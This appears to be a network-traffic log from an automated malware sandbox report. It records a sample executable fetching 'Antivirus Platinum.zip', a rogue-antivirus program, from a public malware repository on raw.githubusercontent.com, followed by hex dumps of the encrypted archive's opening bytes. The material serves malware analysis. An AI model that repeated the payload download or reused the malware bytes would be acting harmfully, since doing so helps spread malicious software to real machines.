                                                                                                                                                Date: Thu, 29 Sep 2022 12:49:40 GMT
                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                Vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With
                                                                                                                                                Access-Control-Allow-Origin: https://render.githubusercontent.com
                                                                                                                                                Location: https://raw.githubusercontent.com/Endermanch/MalwareDatabase/master/rogues/Antivirus%20Platinum.zip
                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                Strict-Transport-Security: max-age=31536000; includeSubdomains; preload
                                                                                                                                                X-Frame-Options: deny
                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                X-XSS-Protection: 0
                                                                                                                                                Referrer-Policy: no-referrer-when-downgrade
                                                                                                                                                Expect-CT: max-age=2592000, report-uri="https://api.github.com/_private/browser/errors"
                                                                                                                                                2022-09-29 12:49:40 UTC9160INData Raw: 43 6f 6e 74 65 6e 74 2d 53 65 63 75 72 69 74 79 2d 50 6f 6c 69 63 79 3a 20 64 65 66 61 75 6c 74 2d 73 72 63 20 27 6e 6f 6e 65 27 3b 20 62 61 73 65 2d 75 72 69 20 27 73 65 6c 66 27 3b 20 62 6c 6f 63 6b 2d 61 6c 6c 2d 6d 69 78 65 64 2d 63 6f 6e 74 65 6e 74 3b 20 63 68 69 6c 64 2d 73 72 63 20 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 20 67 69 73 74 2e 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 3b 20 63 6f 6e 6e 65 63 74 2d 73 72 63 20 27 73 65 6c 66 27 20 75 70 6c 6f 61 64 73 2e 67 69 74 68 75 62 2e 63 6f 6d 20 6f 62 6a 65 63 74 73 2d 6f 72 69 67 69 6e 2e 67 69 74 68 75 62 75 73 65 72 63 6f 6e 74 65 6e 74 2e 63 6f 6d 20 77 77 77 2e 67 69 74 68 75 62 73 74 61 74 75 73 2e
                                                                                                                                                Data Ascii: Content-Security-Policy: default-src 'none'; base-uri 'self'; block-all-mixed-content; child-src github.com/assets-cdn/worker/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com objects-origin.githubusercontent.com www.githubstatus.


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                66192.168.2.349752185.199.108.133443C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                2022-09-29 12:49:40 UTC9162OUTGET /Endermanch/MalwareDatabase/master/rogues/Antivirus%20Platinum.zip HTTP/1.1
                                                                                                                                                Host: raw.githubusercontent.com


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                67185.199.108.133443192.168.2.349752C:\Users\user\Desktop\1jDe7zWnoe.exe
                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                2022-09-29 12:49:40 UTC9162INHTTP/1.1 200 OK
                                                                                                                                                Connection: close
                                                                                                                                                Content-Length: 716432
                                                                                                                                                Cache-Control: max-age=300
                                                                                                                                                Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
                                                                                                                                                Content-Type: application/zip
                                                                                                                                                ETag: "2dd2f92f25598d9ce7015fc31af79216c3c4239d1c9016d16e6d1fa2f0f83264"
                                                                                                                                                Strict-Transport-Security: max-age=31536000
                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                X-Frame-Options: deny
                                                                                                                                                X-XSS-Protection: 1; mode=block
                                                                                                                                                X-GitHub-Request-Id: 98A4:E4BD:C06779:CC85EC:6335934E
                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                Date: Thu, 29 Sep 2022 12:49:40 GMT
                                                                                                                                                Via: 1.1 varnish
                                                                                                                                                X-Served-By: cache-mxp6947-MXP
                                                                                                                                                X-Cache: HIT
                                                                                                                                                X-Cache-Hits: 1
                                                                                                                                                X-Timer: S1664455781.870294,VS0,VE3
                                                                                                                                                Vary: Authorization,Accept-Encoding,Origin
                                                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                                                X-Fastly-Request-ID: 173efdd5b2c6fa79ddb8e6e9f4d6c5d50f617ce5
                                                                                                                                                Expires: Thu, 29 Sep 2022 12:54:40 GMT
                                                                                                                                                Source-Age: 278
                                                                                                                                                2022-09-29 12:49:40 UTC9163INData Raw: 50 4b 03 04 14 00 01 00 08 00 c3 50 3e 3c b9 dd 88 28 ca ed 0a 00 85 8f 0b 00 20 00 00 00 45 6e 64 65 72 6d 61 6e 63 68 40 41 6e 74 69 76 69 72 75 73 50 6c 61 74 69 6e 75 6d 2e 65 78 65 23 1e 4a 14 b1 c4 33 c0 bf 0b ce 01 66 9f a5 a5 fa 94 f3 86 ac 9e 88 9a 72 b7 c5 19 87 bb cc 9c ad 47 32 5b 58 17 8d f5 34 86 d9 16 0f 1c 15 31 7c f1 f6 a3 28 84 c7 dc a1 f4 c8 8e 5a 47 34 b7 d2 b8 58 d0 bd f6 1b 49 18 ba 76 bd e0 c6 eb d6 88 07 41 61 a6 35 34 e4 79 45 10 d7 8c b1 11 4d 68 47 d2 c1 27 14 da 92 65 60 d5 ea 14 a7 93 d9 26 ca 0b ef 17 54 58 41 5c c0 93 12 f1 e2 1b c2 d6 22 7b 35 0e 1d 96 da 55 71 44 a7 69 e1 48 a3 86 1e 19 14 ce cb 01 66 c0 fa c6 d4 f4 c3 8a 40 79 22 00 7d 7b 9e fe b1 e5 df 95 75 bf 90 e9 ea 8d 0d 25 96 56 2f 74 1f d9 2b df 87 3d f2 83 9f 41
                                                                                                                                                Data Ascii: PKP><( Endermanch@AntivirusPlatinum.exe#J3frG2[X41|(ZG4XIvAa54yEMhG'e`&TXA\"{5UqDiHf@y"}{u%V/t+=A
                                                                                                                                                2022-09-29 12:49:40 UTC9179INData Raw: 9d 17 71 b3 4f 65 76 0d ea b6 ab d4 dd e1 ab 48 68 5f 11 fa 1c 13 ad 60 91 a7 05 ba 9e 5a 13 74 5a 3c b2 b9 71 50 c2 16 7e 29 ab fd be 7c 52 56 ad e6 41 51 02 62 ce 41 40 7b 2f ef 0d 52 34 01 27 d3 6c 9f 27 e9 07 7c 47 fc 43 7f f3 0d b4 60 ae 51 f0 01 88 05 99 6d e7 30 d5 ea 86 03 e2 76 76 72 14 83 92 7c 23 c5 36 d9 5a 4c 2f 02 54 c7 d9 fc 1d e4 b0 1f 9d 6e 76 9d 29 b1 ec 73 f6 6d 90 0a aa b6 b5 09 f5 f8 06 34 91 14 52 87 16 6d e0 86 fb eb 4a d5 df 30 9d 34 e3 c4 03 be ac c8 31 61 88 b5 f2 45 9c 23 c2 63 3d 28 13 2b 88 98 65 fc 66 a7 1f 1e 8c 2b a8 0e 2c 41 d6 62 0a fa f3 6a c7 1c b4 6f b9 8c f0 37 0a 11 f5 c5 2b 0a 61 05 b1 38 9f 15 1e e1 33 f4 6e 53 ea ab 4c ac a5 78 f5 10 d7 76 1e 77 e1 ee 30 7a 8f 40 73 c6 bd 9a 71 75 43 89 30 c1 8e 36 a1 e0 b3 12 b2
                                                                                                                                                Data Ascii: qOevHh_`ZtZ<qP~)|RVAQbA@{/R4'l'|GC`Qm0vvr|#6ZL/Tnv)sm4RmJ041aE#c=(+ef+,Abjo7+a83nSLxvw0z@squC06
                                                                                                                                                2022-09-29 12:49:40 UTC9195INData Raw: 85 5c b4 55 0d 8e 3c 15 ab 0b 35 31 a1 b4 02 cf e7 91 25 22 11 61 de 32 b5 d4 e0 7d c2 88 e5 7d 92 b3 d2 d9 c3 b1 00 63 3e 84 f2 94 11 e9 a4 d8 ef 86 97 2c 83 96 ad 05 73 87 50 8b f3 c9 4c 17 3d 6b de 41 e3 de dd 68 32 80 4e c2 46 66 3f 51 6f d3 6d be f4 90 5d 80 13 45 3b 96 c3 5b f1 e2 f5 2d 29 d4 26 a9 e8 d0 50 2a 28 2d 5d 32 83 81 cb 29 c1 3d 8e 21 78 17 36 25 cf cc 9e a3 c6 36 a6 69 df fa b7 e6 c2 06 27 46 c3 2a 30 a5 00 f2 ea fc 45 b6 47 e8 7b 57 4b e3 14 78 f8 c9 25 fe 73 e7 a8 aa 01 9a 6d 28 39 ce f2 6b 4a 99 54 e6 c4 00 df 45 3c cb 5f 9f bf d0 7c 6a 7e 2c 04 53 04 2b 94 a5 4e 11 35 cd a6 0a 29 40 8e 90 42 15 8b 45 31 74 f7 02 19 d6 5d ed 28 3f 34 71 e7 64 00 11 93 0e 26 02 3d 2b 2f f3 7d 56 0b d1 9a 4a 03 1f 09 96 aa ab fa 87 5b 66 63 11 7d 12 17
                                                                                                                                                Data Ascii: \U<51%"a2}}c>,sPL=kAh2NFf?Qom]E;[-)&P*(-]2)=!x6%6i'F*0EG{WKx%sm(9kJTE<_|j~,S+N5)@BE1t](?4qd&=+/}VJ[fc}
                                                                                                                                                2022-09-29 12:49:40 UTC9211INData Raw: 4e 0d f5 f9 48 51 64 9c 6a 6d 14 38 63 e7 75 78 06 a8 94 03 51 5f 27 1c 63 81 18 d1 65 b0 24 56 9f 95 bc 7b 20 22 87 73 74 7e 10 9a ca af 13 7a c9 43 07 65 ec 37 d8 b2 10 d5 f6 bc 33 e8 ef ac 0f 3a ec 9b 7a c6 5e 69 7e ae 42 04 66 09 53 72 69 d1 2e 8d 38 a9 88 e8 aa 45 8e e8 d7 00 ba 54 2a ee 5b ab 01 b9 18 54 c5 4c 59 b6 59 70 c9 20 56 02 4f 2b 9d 8c 23 17 e7 93 c6 f1 c4 48 b8 2e 34 90 2c 85 27 09 6e 8e 47 99 f7 31 69 f2 39 f2 a0 35 40 9b b9 6f 12 b1 39 fd d5 ac 20 da 38 7d ca 89 c9 27 a6 b7 88 d4 62 9f 4e 80 f6 78 e8 d6 c5 9d 0e 77 28 23 43 a9 0a d7 15 57 e9 47 84 3f 4a 65 bf 78 b9 48 ee 98 7a 87 95 a7 e2 e5 7d d4 e2 aa 15 b2 ff a6 0e 5b 4a 46 5e fb 19 d9 35 48 1f 8b 2c ea dc 29 2c e3 14 6e 28 5f 44 90 10 32 3d 3f 52 b8 e2 4a e1 27 0b db 24 65 11 e0 e7
                                                                                                                                                Data Ascii: NHQdjm8cuxQ_'ce$V{ "st~zCe73:z^i~BfSri.8ET*[TLYYp VO+#H.4,'nG1i95@o9 8}'bNxw(#CWG?JexHz}[JF^5H,),n(_D2=?RJ'$e
                                                                                                                                                2022-09-29 12:49:40 UTC9227INData Raw: d4 5a c6 b8 bb 24 29 8f 2d 0b d1 62 9f a7 2a 18 83 5a ca 78 61 b4 f7 63 b1 c6 e5 8b b7 4e de 8d 77 1b 5f bf a2 14 4f 39 6e 07 36 fd 01 81 73 6d b6 d3 cd 1a 34 3d 09 74 41 77 a2 ac 0d c5 b8 4c a9 18 ab 02 b9 ff 17 fa 01 0f 9d 28 65 9c e1 fb 38 b1 74 90 d9 cb 57 95 4c d6 5f 3e e1 6f 01 f4 3f b2 5a f0 d0 c2 72 2b 74 83 f8 2a 94 17 d9 3a b4 21 45 7a 40 0e 69 38 50 a9 52 a0 fe fd af bb c0 53 12 d1 4a 7a cd 67 76 02 ca db fc 4d 94 33 3a 62 5f ec 17 32 d6 9e 35 93 bb f9 2c c6 0d df e7 80 15 64 45 ec c1 8e 37 c7 12 51 b2 b4 2c 32 47 3a 9b 3c 70 4f 00 ff af 02 dd 09 10 e0 e9 b4 e3 84 2f 8a fc bc 48 90 f0 ff 32 e3 22 c4 2a a6 12 38 55 6b f3 0e a6 75 8a 91 c4 20 7f eb f7 bd 18 8a da 7a 3f 20 b6 88 26 0e 9a d3 0d dd cf 1f f4 86 32 db c5 f9 70 67 7c f5 2c 8e f9 c8 35
                                                                                                                                                Data Ascii: Z$)-b*ZxacNw_O9n6sm4=tAwL(e8tWL_>o?Zr+t*:!Ez@i8PRSJzgvM3:b_25,dE7Q,2G:<pO/H2"*8Uku z? &2pg|,5
                                                                                                                                                2022-09-29 12:49:40 UTC9243INData Raw: fe f6 cb fd 23 f7 3d 2b 8b ad 4d 42 1c 90 86 c2 6a d4 c7 9d 6a 51 76 fa c7 d0 04 51 56 96 ef 3b 6a 8d 9a ae 86 58 ea 9e 79 37 19 51 be d5 eb 21 c8 89 58 c7 65 a5 41 de 10 4e d0 d7 0e 84 07 c8 30 7a f7 85 4a 18 ac 78 86 dc e7 12 44 06 4a 14 38 84 7e c9 d2 2f c6 92 8e 7f b5 75 8c b9 d3 16 ed 5a 80 78 56 34 aa 9a 96 79 08 3b ac 63 d1 b4 6d b2 84 40 c4 fc 71 e2 99 61 d9 83 cc fb 21 48 a9 c5 b3 c1 6d 4e 95 7b ac 18 47 71 9a 6c 57 09 0c eb 80 52 19 7e 7b cc 98 a3 ff d0 3a a7 b3 04 f6 31 23 c5 25 32 76 b8 79 68 3a 6b 8c b2 90 fe 4e 11 61 ae 4e 37 59 5c 44 05 1c 0d 76 f7 82 ca 1c a1 e3 71 54 6f 35 40 e1 ad 1e ff 08 01 94 e6 dd e7 8a 7e af 1f 5f 6b 4d e6 d4 aa ae e0 f1 1e d7 bb 9a 4d 13 01 75 52 bc cb 12 0c 53 af 39 07 34 f9 fc 98 d2 aa f4 5d ad cf c5 b6 ce 70 94
                                                                                                                                                Data Ascii: #=+MBjjQvQV;jXy7Q!XeAN0zJxDJ8~/uZxV4y;cm@qa!HmN{GqlWR~{:1#%2vyh:kNaN7Y\DvqTo5@~_kMMuRS94]p
                                                                                                                                                2022-09-29 12:49:40 UTC9259INData Raw: d1 80 3f 7a e0 d5 37 e7 c6 92 7a f2 6c 14 d3 7b d8 bf 0e 3a 34 82 a3 bf d1 0d a6 68 48 d4 d0 3b 10 89 ac 05 46 de 29 ba 22 af 31 f6 db 53 79 16 61 4e a2 26 db 93 ef 2c 75 9f 51 36 bd 40 44 5c f5 2e 21 e7 7b 9e 6f ef 8b 04 f4 8c d4 d3 82 82 78 52 97 84 ef b2 9c 5f 0f 94 cd 74 cb 49 56 ed 64 1e 36 6f a4 bb 44 09 31 79 0c a9 82 26 1a c3 6b 41 ac a8 da c0 96 4b dd a6 0c ea 30 c6 39 a9 d3 03 5a d6 ef 5a 50 df 78 c6 d1 0c c5 78 95 48 25 b1 52 44 da 2f d9 27 59 6a 31 9b 8f df e3 06 3a b5 bb 4f c8 eb 5a 4d 49 aa f4 4b 57 3e 65 ad 64 d3 f2 a2 13 34 3d 8c ac a8 a7 09 56 65 fa 8c 47 40 76 ad 00 ea 79 8a 53 5b 71 78 f6 16 86 8e 29 58 35 5a 8c 0c dd 21 0a 49 4e 1a 2f eb ef a5 49 98 8b 55 c7 b6 e4 95 ef 66 fb 8b f4 44 9d 21 82 c9 41 a9 75 63 ce 03 43 47 f0 9b 7f 1f d3
                                                                                                                                                Data Ascii: ?z7zl{:4hH;F)"1SyaN&,uQ6@D\.!{oxR_tIVd6oD1y&kAK09ZZPxxH%RD/'Yj1:OZMIKW>ed4=VeG@vyS[qx)X5Z!IN/IUfD!AucCG
                                                                                                                                                2022-09-29 12:49:40 UTC9275INData Raw: 0e 09 26 c1 e7 8c 87 b9 a0 e6 00 7b 79 eb f0 c9 31 eb b9 02 26 26 90 31 45 94 a0 c2 16 e8 20 07 94 25 75 d8 1e fc fb e6 19 fc d4 51 f0 a6 68 bd fa b9 d5 9e da a9 ad 54 7a 39 6c 7e c3 17 9d 26 a7 46 69 a5 32 2e b8 9f c0 5d f5 5f a2 76 29 4e 85 38 c7 cf 05 62 8f 9d 76 e9 5d 2d 12 74 b2 52 ae 81 06 c9 b3 6b e9 4d e5 93 b7 3f 56 f5 2e a6 81 58 14 7a 92 b5 36 e2 63 e5 dc 0f a4 8e 07 fa d4 8d c2 27 9e 5e 50 f8 6a 2e e1 70 5e b7 98 df f4 d2 71 67 ce d0 e8 d9 9b 31 ce 63 15 49 0a 73 71 7e bc 47 a4 ee de 61 22 87 9c 9c a4 61 88 a8 f2 8a f8 09 56 1e c6 93 eb a6 21 0a cd df 5c 57 ae 8b 84 7b 04 b2 fb 22 87 ee 66 f4 13 5a 21 b3 ac c8 85 0e 84 18 a7 45 1f a3 12 d5 9e 92 5b a6 9f 2d ae 1e a3 cc 05 9a 35 72 32 a5 ba 1d 8c 72 f6 91 de 72 2a b6 95 3c 6a 8f 1d c9 cb 0c 37
                                                                                                                                                Data Ascii: &{y1&&1E %uQhTz9l~&Fi2.]_v)N8bv]-tRkM?V.Xz6c'^Pj.p^qg1cIsq~Ga"aV!\W{"fZ!E[-5r2rr*<j7
                                                                                                                                                2022-09-29 12:49:40 UTC9291INData Raw: 2f 84 85 a3 94 9f cd 28 3b 2f 57 d3 82 36 9e a4 a0 20 dc 94 0f cf 81 45 2c 0d b4 13 5a 2e ae a9 5d 55 03 0b f8 aa fc 9f f9 73 8a 10 95 1f 84 8c b1 0d b6 f3 c1 0e 2d da 96 c9 46 59 f3 3c c0 dd 0e b7 4e db 8f a1 98 6a b6 35 f3 eb 91 c5 ad 1a 88 c6 6d f6 c9 42 43 29 60 bc 7b 9a 00 51 ad fc d7 d0 d6 0f 7a 9c 51 2d d1 64 02 c6 a5 38 c4 0a be 5d 2a 13 ea a5 2a 6a e8 37 c2 16 67 3d 9b 4a cc d2 63 a1 ef fe 82 2c 0d fe 27 6b 87 d6 7a 39 41 58 5d c7 bf ef 1c c8 ea b1 ca 4c 35 2a a2 44 d7 40 53 94 a9 b8 19 a6 03 d5 f6 73 98 18 b0 27 d0 35 87 6f 58 bd 13 16 e9 c8 a5 88 32 0d aa d2 21 11 25 cb 33 42 15 72 ba f4 03 e1 32 d9 0c ee fe 45 ef e3 4e ec 27 bc ad cb 02 9f 2d ca 14 9c c5 d1 4d 0c ae f2 16 26 46 b5 b0 56 bc 13 ef 9c 18 df ca 39 b0 db 03 78 8c 43 72 e2 09 28 bd
                                                                                                                                                Data Ascii: /(;/W6 E,Z.]Us-FY<Nj5mBC)`{QzQ-d8]**j7g=Jc,'kz9AX]L5*D@Ss'5oX2!%3Br2EN'-M&FV9xCr(
                                                                                                                                                2022-09-29 12:49:40 UTC9307INData Raw: 26 6d 6d 59 5d e3 98 1c 6f 2e 85 69 b3 e2 dc 77 91 8a 49 6b db 1e 04 f4 27 3d a0 6d f2 aa c2 14 87 80 9e 7f c2 72 15 16 d6 ca 00 cd 92 b3 dd a8 cc 76 d0 03 25 64 00 e3 87 aa e1 30 f9 c3 2c 00 12 bc 4f a2 1f 34 da 01 68 5d 89 11 29 c9 41 7a a3 9b 35 c6 62 53 05 56 9b 3d 3c f1 4e eb 48 1d 1d 57 a6 3f 0e df 57 a1 04 aa 93 4c 95 fe 25 11 4b ee 3b fc c1 49 cc 44 5c a7 39 df f1 95 9b d9 87 3a 27 fd 60 73 41 00 37 d9 5c 96 bb a2 b4 8d f3 21 69 ad da 33 5d 47 30 20 29 d6 fd 40 59 e5 9a b2 36 26 fa 8a 10 95 72 c4 13 91 55 15 5a a2 fb 86 86 60 b4 db e2 78 74 0e 97 42 19 ef 32 4c a3 51 3e 1d 86 cf b0 49 99 9a 09 b2 ea 82 cc 56 68 d7 5b 1a 4f 44 81 35 c4 58 04 98 eb 85 1d 62 b3 d4 3b 7b d8 5f e7 db c2 4b 4a 5e 8f d4 ed dd 78 07 9a eb 52 e1 49 56 8d b1 5c b2 98 d0 d8
                                                                                                                                                Data Ascii: &mmY]o.iwIk'=mrv%d0,O4h])Az5bSV=<NHW?WL%K;ID\9:'`sA7\!i3]G0 )@Y6&rUZ`xtB2LQ>IVh[OD5Xb;{_KJ^xRIV\
                                                                                                                                                2022-09-29 12:49:40 UTC9323INData Raw: 00 e5 a8 9d e5 b8 94 c6 fe e6 bb 1c 81 72 db ff c4 7d 1f 3c 07 8b c4 80 fa 24 c6 40 fb 85 94 3d ce 61 87 59 6c 3f 56 c2 37 87 b9 63 50 62 98 b1 83 2d 63 fb 36 a2 b8 9d 50 55 70 20 08 fd 8c 7f f6 2d da 7b a3 4e c2 d0 ad ee d3 7e b6 db 13 a2 a7 fb 88 02 87 f6 14 e1 b6 41 80 c6 61 2a a3 f5 56 d8 42 ff 6e 81 24 7e b0 86 d1 a6 a6 cf db e2 45 8d c0 4a 30 61 74 d0 e7 99 46 14 1e 99 a6 1d 81 8b 78 0f 2f 6d c0 a2 10 64 6b 4f 10 5d bf df 29 44 ec 69 d7 68 17 0c 5c 80 75 ee 2b b1 9b a5 51 5f 4f 55 d6 a7 aa eb c9 28 70 73 97 3f bf 64 56 9e 2a 5e db 63 1f c5 12 5b 7c f3 a5 84 dc 2e 75 83 08 81 e2 89 b9 5b 87 87 26 27 30 2a 2c f2 8b 9d 09 06 3f d8 6e 96 03 f2 b2 55 c7 1f 54 62 17 24 5c 8b a3 e7 86 ee 09 17 3b 17 c2 8d 6e 21 e6 f6 a5 18 b1 f6 1f 7a f7 61 39 0f 58 fd bf
                                                                                                                                                Data Ascii: r}<$@=aYl?V7cPb-c6PUp -{N~Aa*VBn$~EJ0atFx/mdkO])Dih\u+Q_OU(ps?dV*^c[|.u[&'0*,?nUTb$\;n!za9X
                                                                                                                                                2022-09-29 12:49:40 UTC9339INData Raw: 1d c8 15 39 60 75 42 1a 41 b9 cf be 52 a1 fd f1 31 1c 08 4d bf 7b e4 22 f0 9e 37 cd a9 3b 68 dd 37 3f eb 35 e6 80 1f ff 89 f7 47 c5 37 7e 5a d2 05 77 c1 25 c8 73 41 e6 40 f9 43 af 7d 33 86 13 03 7d 7b 21 c0 2a 4d d5 8f 39 09 38 87 5a 42 2d 71 a2 cc bc 34 a1 30 24 40 13 e6 1e 07 3b 1b 40 e9 34 16 1e 92 b3 3d 95 db f0 6a 1c 73 0c ab df cf 05 3b 2e 12 49 55 de 96 d2 57 96 a6 2b f2 e3 a7 50 4f 84 22 8c e0 dd ee d9 f7 88 69 69 c9 1d e8 80 6d 28 b9 0b 6e a0 b7 35 65 24 86 9a 67 0e 14 b9 c2 ab 35 b8 7c 4c ef 63 d5 f1 7c aa c1 fa 61 ff 96 46 1f 4d 67 7d 20 5a d7 ac 59 d3 97 b0 f3 6c c0 5a b9 84 98 03 96 ea 9e 6f 8f 4d 19 62 3f 30 86 2e 3d 04 34 9c 1c 52 c0 1b a1 3d a7 e8 03 bf 84 74 d3 9b b6 bd 4c 2b e2 b8 b6 02 4c be 75 ff 2f 50 75 f5 44 28 92 c8 3c 3c be 02 91
                                                                                                                                                Data Ascii: 9`uBAR1M{"7;h7?5G7~Zw%sA@C}3}{!*M98ZB-q40$@;@4=js;.IUW+PO"iim(n5e$g5|Lc|aFMg} ZYlZoMb?0.=4R=tL+Lu/PuD(<<
                                                                                                                                                2022-09-29 12:49:40 UTC9355INData Raw: 9a 09 b7 ee 2f d3 1d f6 05 f7 eb e7 9d c7 a8 75 62 ac b3 2c d9 4b b3 b3 4e 88 c9 82 60 3b ab 3c d2 57 52 56 3f 59 12 c0 44 02 71 eb 68 10 28 16 37 78 df 28 69 ad c4 e0 0a 78 12 0e c8 1c ac d2 ba 32 78 25 87 7b a0 88 c8 4a 5e e1 fb 0b 97 4f c1 85 c7 17 68 b4 86 a5 db ec e3 43 8e b3 65 fc 43 24 b6 38 2d 35 38 86 25 aa 8d 32 6c d7 de 17 7f d5 06 a9 95 91 08 c6 e9 2a 3e 82 fd 7b 62 36 09 2b 16 6c 9d e5 62 9c f5 fa bd 4f a0 b7 cf d5 03 25 ae 98 77 c4 22 22 03 82 c2 93 a4 02 bc 44 62 cb 3d 93 ac 90 ed 8c cb fd a3 05 64 d7 99 10 ca 13 7f c8 f5 e1 60 69 34 96 1c 6d ae fc 5d d9 81 72 62 5e 3b 09 59 e9 46 d6 56 30 35 3f 93 40 33 90 79 a1 00 da 79 d6 6d 5f ac 62 3c 1e 9b 8c 80 5f bc 24 9c e4 f1 a0 77 97 70 2a 58 a0 6c 58 3d b2 34 0e 84 68 14 d1 fc 2b 73 18 8a 67 d3
                                                                                                                                                Data Ascii: /ub,KN`;<WRV?YDqh(7x(ix2x%{J^OhCeC$8-58%2l*>{b6+lbO%w""Db=d`i4m]rb^;YFV05?@3yym_b<_$wp*XlX=4h+sg
                                                                                                                                                2022-09-29 12:49:40 UTC9371INData Raw: 92 a3 97 0a 2c 9d d7 34 8e 4e 5a 21 1b fb c5 3b 8d 64 68 3d 09 ef 11 60 d6 6e a1 b1 bc da ad a5 e3 fc 61 66 66 af ce c0 70 55 46 22 ee 28 60 1f 77 4a de b4 05 42 58 0a f1 88 d2 82 20 ac 4f 1e 85 96 9e a7 a1 da 82 f4 c8 02 c0 40 4f 93 e4 8e 6b 57 30 76 bc 34 fa 5b 49 3c 80 48 a7 3d bd c2 fa 99 2f 28 7b a4 99 93 b4 6e 8b 0a 50 1e 7b dd 7a 75 96 39 e6 50 ad 8d 5b 14 ee 68 d4 75 ed fc 53 78 c6 81 af 46 7f a4 95 ec 9c 99 50 55 69 7c af 01 2b 8f 6c 43 61 e5 7d 8d 8d 84 69 52 e3 af 52 6b 99 d0 73 61 d3 94 3f ba 41 2e 6c 23 da a9 82 4b 12 78 1b b7 cb 2f 65 d0 bf 7b c8 1d 5f 2e 68 02 fe a5 48 11 55 94 92 b6 19 6f a3 3a 05 22 66 24 92 ff ad 28 dc 76 ca d7 49 a8 ce 89 a2 5a d5 1f 6e 6b a8 32 fc 4f d3 60 7e 78 3f 40 9b 33 b9 9b 38 b2 d0 8c 5f 02 fb e2 d5 6d 3e b6 b3
                                                                                                                                                Data Ascii: ,4NZ!;dh=`naffpUF"(`wJBX O@OkW0v4[I<H=/({nP{zu9P[huSxFPUi|+lCa}iRRksa?A.l#Kx/e{_.hHUo:"f$(vIZnk2O`~x?@38_m>
                                                                                                                                                2022-09-29 12:49:40 UTC9387INData Raw: 8e 30 12 ee fd 27 a9 d5 0c 49 8c 91 cd a7 f7 59 cd 50 19 3a c5 2f 49 13 3b 29 2d 69 61 ad 19 af bc 4c 83 4c 2c 81 7e 43 0f ee 7a 31 30 d9 0c e7 d3 de 5f 48 5f 0b 02 ba e9 ae 3a 64 39 c3 9b 20 e0 9d 4b 85 e0 d3 72 07 ba 4a e5 7b f9 a7 4f d3 af f9 27 ec e5 f8 46 a7 b4 d7 91 28 a3 4b 24 e2 6c dd 09 73 ed 0a c8 40 c8 7b 9e cd be e6 7b b1 ba 78 23 8f 9a 68 6b 2e 7c 4f e8 e9 c8 9e e3 55 17 7d ea 96 1d f3 40 65 ee 29 39 df e2 75 d6 6c f9 be 45 4e 61 36 e7 cb 8e 77 0c 9e 53 90 76 09 63 79 1b f8 d3 99 42 62 e2 49 27 c9 fc ae c5 96 5c 58 21 ed 87 aa 07 f5 3c cd cc 5f a2 88 c9 1e 45 62 f0 8b 59 20 4c d2 87 f6 d5 42 2e 8e a2 ab 1d 05 02 8d e2 d4 e1 17 49 c1 21 ce 45 ca 3c 37 ed c2 00 88 8d a6 20 2d 19 b3 0c dd 5d c4 c1 71 9e 7f 0f bc 72 c7 7c 18 96 d0 d8 1e fc ff 25
                                                                                                                                                Data Ascii: 0'IYP:/I;)-iaLL,~Cz10_H_:d9 KrJ{O'F(K$ls@{{x#hk.|OU}@e)9ulENa6wSvcyBbI'\X!<_EbY LB.I!E<7 -]qr|%
                                                                                                                                                2022-09-29 12:49:40 UTC9403INData Raw: 9d c7 0d f4 d4 fc e6 0e 5a 9a 13 7e e2 09 12 2c 4b 22 90 1a 2b 9f 2b 06 ae 48 30 8f 9f ad 8f 91 24 1a 9a 21 30 54 f7 56 ef 38 87 b1 84 32 fa 0b 89 51 95 be 1d 39 5d 9b 0a 78 83 83 02 e2 17 4a 14 fd bb b8 31 07 60 1d fd 94 a8 00 eb 68 5d 5a 24 64 06 55 af 46 04 0d 80 76 12 ce 97 51 c7 d3 67 43 e4 a8 ae 57 22 76 61 e3 7c bf 30 42 4c 82 08 db 25 68 b1 a2 7b 11 0d fc e3 6f f9 98 0b 57 e5 b0 c1 d0 30 cf 72 9f b7 23 05 f1 5b a9 57 c9 d6 05 d6 d1 45 e0 a2 15 6b f5 1f 1c 06 72 ed a0 01 5e aa dd 53 ee b7 4f 94 49 e7 ce a7 36 9f bc 42 55 9b 42 05 73 59 cd b2 98 02 4e 0f 03 9c 67 7c 3e 76 a0 37 a5 70 ff f9 a3 2c 54 41 06 41 20 2e 91 da c5 59 71 2a e1 5a dc f4 34 67 b4 8e 3b c3 90 4d 2e 09 dd 38 7a 78 ad 78 e4 2b 9e 5b 3e 78 2b ed bb 20 fa 7c 5f 54 d4 3c 68 95 3e 42
                                                                                                                                                Data Ascii: Z~,K"++H0$!0TV82Q9]xJ1`h]Z$dUFvQgCW"va|0BL%h{oW0r#[WEkr^SOI6BUBsYNg|>v7p,TAA .Yq*Z4g;M.8zxx+[>x+ |_T<h>B
